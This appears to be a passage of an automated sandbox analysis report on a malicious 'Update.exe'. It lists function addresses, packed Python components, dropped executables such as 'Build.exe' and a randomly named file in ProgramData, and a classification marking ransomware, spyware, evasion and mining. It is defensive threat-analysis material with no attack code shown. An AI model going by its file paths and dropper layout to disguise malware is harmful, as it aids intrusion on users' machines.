                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE13981_2_00007FFDFAEE1398
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAF91AA01_2_00007FFDFAF91AA0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE114F1_2_00007FFDFAEE114F
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE13F21_2_00007FFDFAEE13F2
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE14511_2_00007FFDFAEE1451
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEEF9C51_2_00007FFDFAEEF9C5
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE1C991_2_00007FFDFAEE1C99
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE199C1_2_00007FFDFAEE199C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE115E1_2_00007FFDFAEE115E
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEF12F01_2_00007FFDFAEF12F0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE15B41_2_00007FFDFAEE15B4
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE1BE01_2_00007FFDFAEE1BE0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEFF6601_2_00007FFDFAEFF660
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE1A8C1_2_00007FFDFAEE1A8C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE17BE1_2_00007FFDFAEE17BE
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE15371_2_00007FFDFAEE1537
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE6BA01_2_00007FFDFAEE6BA0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAF40B501_2_00007FFDFAF40B50
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE20B31_2_00007FFDFAEE20B3
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE168B1_2_00007FFDFAEE168B
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE195B1_2_00007FFDFAEE195B
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAF302401_2_00007FFDFAF30240
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE25721_2_00007FFDFAEE2572
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAF484601_2_00007FFDFAF48460
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE1DD41_2_00007FFDFAEE1DD4
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB2F6EE01_2_00007FFDFB2F6EE0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA707C1_2_00007FFDFAFA707C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA36981_2_00007FFDFAFA3698
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA416A1_2_00007FFDFAFA416A
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA348B1_2_00007FFDFAFA348B
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA60DC1_2_00007FFDFAFA60DC
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFBBF201_2_00007FFDFAFBBF20
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFBBD601_2_00007FFDFAFBBD60
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA5E251_2_00007FFDFAFA5E25
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA5A651_2_00007FFDFAFA5A65
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB0D3CC01_2_00007FFDFB0D3CC0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA1CC61_2_00007FFDFAFA1CC6
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA26711_2_00007FFDFAFA2671
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA3BA71_2_00007FFDFAFA3BA7
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA72571_2_00007FFDFAFA7257
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA38371_2_00007FFDFAFA3837
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA29871_2_00007FFDFAFA2987
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA114F1_2_00007FFDFAFA114F
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA6EF11_2_00007FFDFAFA6EF1
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFCB1C01_2_00007FFDFAFCB1C0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFBF2001_2_00007FFDFAFBF200
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFBF0601_2_00007FFDFAFBF060
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB15B0E01_2_00007FFDFB15B0E0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA50B01_2_00007FFDFAFA50B0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB0D77801_2_00007FFDFB0D7780
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA57D61_2_00007FFDFAFA57D6
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA1B361_2_00007FFDFAFA1B36
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA435E1_2_00007FFDFAFA435E
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB00F7001_2_00007FFDFB00F700
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA37921_2_00007FFDFAFA3792
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA474B1_2_00007FFDFAFA474B
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA2D101_2_00007FFDFAFA2D10
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB0D74801_2_00007FFDFB0D7480
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFCB5501_2_00007FFDFAFCB550
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA3A941_2_00007FFDFAFA3A94
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB0E2C001_2_00007FFDFB0E2C00
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA1B271_2_00007FFDFAFA1B27
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA5F101_2_00007FFDFAFA5F10
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA4D091_2_00007FFDFAFA4D09
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA5DA31_2_00007FFDFAFA5DA3
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB15A9001_2_00007FFDFB15A900
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA44CB1_2_00007FFDFAFA44CB
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA53AD1_2_00007FFDFAFA53AD
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA23F61_2_00007FFDFAFA23F6
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB1430101_2_00007FFDFB143010
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA638E1_2_00007FFDFAFA638E
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA213A1_2_00007FFDFAFA213A
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA53C61_2_00007FFDFAFA53C6
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFBEF001_2_00007FFDFAFBEF00
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA4F431_2_00007FFDFAFA4F43
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA21711_2_00007FFDFAFA2171
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA15C81_2_00007FFDFAFA15C8
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA54CF1_2_00007FFDFAFA54CF
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA12991_2_00007FFDFAFA1299
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA65641_2_00007FFDFAFA6564
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB082CD01_2_00007FFDFB082CD0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA54341_2_00007FFDFAFA5434
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA6EBF1_2_00007FFDFAFA6EBF
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA1A501_2_00007FFDFAFA1A50
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA36341_2_00007FFDFAFA3634
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA23011_2_00007FFDFAFA2301
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA26EE1_2_00007FFDFAFA26EE
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA2FD11_2_00007FFDFAFA2FD1
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA11CC1_2_00007FFDFAFA11CC
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB1561001_2_00007FFDFB156100
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA6D5C1_2_00007FFDFAFA6D5C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA4E531_2_00007FFDFAFA4E53
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA68CA1_2_00007FFDFAFA68CA
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA318E1_2_00007FFDFAFA318E
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA6FFF1_2_00007FFDFAFA6FFF
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB0E25D01_2_00007FFDFB0E25D0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB0CE5F01_2_00007FFDFB0CE5F0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA144C1_2_00007FFDFAFA144C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA12171_2_00007FFDFAFA1217
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA10AA1_2_00007FFDFAFA10AA
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA65A01_2_00007FFDFAFA65A0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA44081_2_00007FFDFAFA4408
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA1D021_2_00007FFDFAFA1D02
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA36021_2_00007FFDFAFA3602
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB0CDC501_2_00007FFDFB0CDC50
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA59FC1_2_00007FFDFAFA59FC
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB1599D01_2_00007FFDFB1599D0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA3A8A1_2_00007FFDFAFA3A8A
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA14241_2_00007FFDFAFA1424
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA27611_2_00007FFDFAFA2761
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA4C191_2_00007FFDFAFA4C19
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA22B11_2_00007FFDFAFA22B1
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA736A1_2_00007FFDFAFA736A
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA1D881_2_00007FFDFAFA1D88
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA72AC1_2_00007FFDFAFA72AC
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA16221_2_00007FFDFAFA1622
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA228E1_2_00007FFDFAFA228E
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA55151_2_00007FFDFAFA5515
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA428C1_2_00007FFDFAFA428C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFBD2601_2_00007FFDFAFBD260
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA30C61_2_00007FFDFAFA30C6
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA5BF51_2_00007FFDFAFA5BF5
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFC52001_2_00007FFDFAFC5200
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB1450B01_2_00007FFDFB1450B0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB1591001_2_00007FFDFB159100
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA710D1_2_00007FFDFAFA710D
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB0D91301_2_00007FFDFB0D9130
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB0E17601_2_00007FFDFB0E1760
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA4C3C1_2_00007FFDFAFA4C3C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA2E911_2_00007FFDFAFA2E91
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA54D41_2_00007FFDFAFA54D4
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA276B1_2_00007FFDFAFA276B
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA4ACA1_2_00007FFDFAFA4ACA
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA504C1_2_00007FFDFAFA504C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFB0D14901_2_00007FFDFB0D1490
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA32EC1_2_00007FFDFAFA32EC
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA56141_2_00007FFDFAFA5614
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA59341_2_00007FFDFAFA5934
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFE013602101_2_00007FFE01360210
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFE013200901_2_00007FFE01320090
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFE0130EB601_2_00007FFE0130EB60
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFE01381F401_2_00007FFE01381F40
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFE013061C01_2_00007FFE013061C0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFE013390801_2_00007FFE01339080
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFE0134D0B01_2_00007FFE0134D0B0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFE133375081_2_00007FFE13337508
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9AEE30277_2_00007FFD9AEE3027
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: 17_2_00007FF633FE528917_2_00007FF633FE5289
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: 17_2_00007FF633FE528917_2_00007FF633FE5289
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: 17_2_00007FF633FE528917_2_00007FF633FE5289
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: 17_2_00007FF633FE528917_2_00007FF633FE5289
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: 17_2_00007FF633FE528917_2_00007FF633FE5289
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: 17_2_00007FF633FE528917_2_00007FF633FE5289
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: 17_2_00007FF633FE528917_2_00007FF633FE5289
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: 17_2_00007FF633FE528917_2_00007FF633FE5289
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: 17_2_00007FF633FE528917_2_00007FF633FE5289
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: 17_2_00007FF633FE528917_2_00007FF633FE5289
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: 17_2_00007FF633FE528917_2_00007FF633FE5289
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: 17_2_00007FF633FE528917_2_00007FF633FE5289
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeCode function: 23_2_0511F94323_2_0511F943
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeCode function: 23_2_0511D02423_2_0511D024
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeCode function: 97_2_00007FF771DB528997_2_00007FF771DB5289
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeCode function: 97_2_00007FF771DB528997_2_00007FF771DB5289
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeCode function: 97_2_00007FF771DB528997_2_00007FF771DB5289
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeCode function: 97_2_00007FF771DB528997_2_00007FF771DB5289
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeCode function: 97_2_00007FF771DB528997_2_00007FF771DB5289
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeCode function: 97_2_00007FF771DB528997_2_00007FF771DB5289
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeCode function: 97_2_00007FF771DB528997_2_00007FF771DB5289
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeCode function: 97_2_00007FF771DB528997_2_00007FF771DB5289
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeCode function: 97_2_00007FF771DB528997_2_00007FF771DB5289
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeCode function: 97_2_00007FF771DB528997_2_00007FF771DB5289
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeCode function: 97_2_00007FF771DB528997_2_00007FF771DB5289
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeCode function: 97_2_00007FF771DB528997_2_00007FF771DB5289
                    Source: C:\Windows\System32\conhost.exeCode function: 113_2_0000000140003150113_2_0000000140003150
                    Source: C:\Windows\System32\conhost.exeCode function: 113_2_00000001400026E0113_2_00000001400026E0
                    Source: C:\Users\user\Desktop\Update.exeCode function: String function: 00007FFDFAFA3012 appears 55 times
                    Source: C:\Users\user\Desktop\Update.exeCode function: String function: 00007FFDFAF4DFBF appears 216 times
                    Source: C:\Users\user\Desktop\Update.exeCode function: String function: 00007FFDFAFA698D appears 46 times
                    Source: C:\Users\user\Desktop\Update.exeCode function: String function: 00007FF623F72910 appears 34 times
                    Source: C:\Users\user\Desktop\Update.exeCode function: String function: 00007FFDFAF4E055 appears 105 times
                    Source: C:\Users\user\Desktop\Update.exeCode function: String function: 00007FFDFAEE12EE appears 574 times
                    Source: C:\Users\user\Desktop\Update.exeCode function: String function: 00007FF623F72710 appears 104 times
                    Source: C:\Users\user\Desktop\Update.exeCode function: String function: 00007FFDFAFA2A09 appears 165 times
                    Source: C:\Users\user\Desktop\Update.exeCode function: String function: 00007FFDFAFA405C appears 597 times
                    Source: C:\Users\user\Desktop\Update.exeCode function: String function: 00007FFDFAFA1EF6 appears 1173 times
                    Source: C:\Users\user\Desktop\Update.exeCode function: String function: 00007FFDFAFA4840 appears 107 times
                    Source: C:\Users\user\Desktop\Update.exeCode function: String function: 00007FFDFAFA24BE appears 66 times
                    Source: C:\Users\user\Desktop\Update.exeCode function: String function: 00007FFDFAFA2739 appears 410 times
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeCode function: String function: 00007FF771DB1394 appears 33 times
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: String function: 00007FF633FE1394 appears 33 times
                    Source: Update.exeStatic PE information: invalid certificate
                    Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: Update.exeBinary or memory string: OriginalFilename vs Update.exe
                    Source: Update.exe, 00000000.00000003.1664178146.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs Update.exe
                    Source: Update.exe, 00000000.00000003.1662760568.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs Update.exe
                    Source: Update.exe, 00000000.00000003.1662273737.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs Update.exe
                    Source: Update.exe, 00000000.00000003.1662388921.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs Update.exe
                    Source: Update.exe, 00000000.00000003.1666677887.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs Update.exe
                    Source: Update.exe, 00000000.00000003.1662687144.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs Update.exe
                    Source: Update.exe, 00000000.00000000.1661513638.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewcodstub.dllj% vs Update.exe
                    Source: Update.exe, 00000000.00000003.1662455082.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs Update.exe
                    Source: Update.exe, 00000000.00000003.1662193789.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs Update.exe
                    Source: Update.exe, 00000000.00000003.1661738762.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs Update.exe
                    Source: Update.exe, 00000000.00000003.1662115518.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs Update.exe
                    Source: Update.exe, 00000000.00000003.1666010407.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs Update.exe
                    Source: Update.exe, 00000000.00000003.1662618429.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs Update.exe
                    Source: Update.exe, 00000000.00000003.1665914931.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs Update.exe
                    Source: Update.exe, 00000000.00000003.1662548156.0000019DCB061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs Update.exe
                    Source: Update.exeBinary or memory string: OriginalFilename vs Update.exe
                    Source: Update.exe, 00000001.00000002.1990259366.00007FFE0EB6D000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs Update.exe
                    Source: Update.exe, 00000001.00000002.1994286301.00007FFE12E1C000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs Update.exe
                    Source: Update.exe, 00000001.00000002.1989865904.00007FFE01477000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs Update.exe
                    Source: Update.exe, 00000001.00000002.1990700272.00007FFE10244000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs Update.exe
                    Source: Update.exe, 00000001.00000002.1993235951.00007FFE1031E000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs Update.exe
                    Source: Update.exe, 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs Update.exe
                    Source: Update.exe, 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs Update.exe
                    Source: Update.exe, 00000001.00000002.1994500681.00007FFE130CC000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs Update.exe
                    Source: Update.exe, 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs Update.exe
                    Source: Update.exe, 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewcodstub.dllj% vs Update.exe
                    Source: Update.exe, 00000001.00000002.1993956246.00007FFE126FB000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs Update.exe
                    Source: Update.exe, 00000001.00000002.1989232104.00007FFDFB778000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython310.dll. vs Update.exe
                    Source: Update.exe, 00000001.00000002.1991193682.00007FFE10268000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs Update.exe
                    Source: Update.exe, 00000001.00000002.1994962808.00007FFE13323000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs Update.exe
                    Source: Update.exe, 00000001.00000002.1986656867.00007FFDFA227000.00000004.00000001.01000000.00000015.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs Update.exe
                    Source: Update.exe, 00000001.00000002.1993583200.00007FFE11527000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs Update.exe
                    Source: libcrypto-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9983946492448331
                    Source: libssl-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9922997485632183
                    Source: python310.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9992644702528288
                    Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9976026860367893
                    Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9937050102833638
                    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.mine.winEXE@192/67@3/3
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8648:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8676:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8976:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8492:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8452:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9116:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8024:120:WilError_03
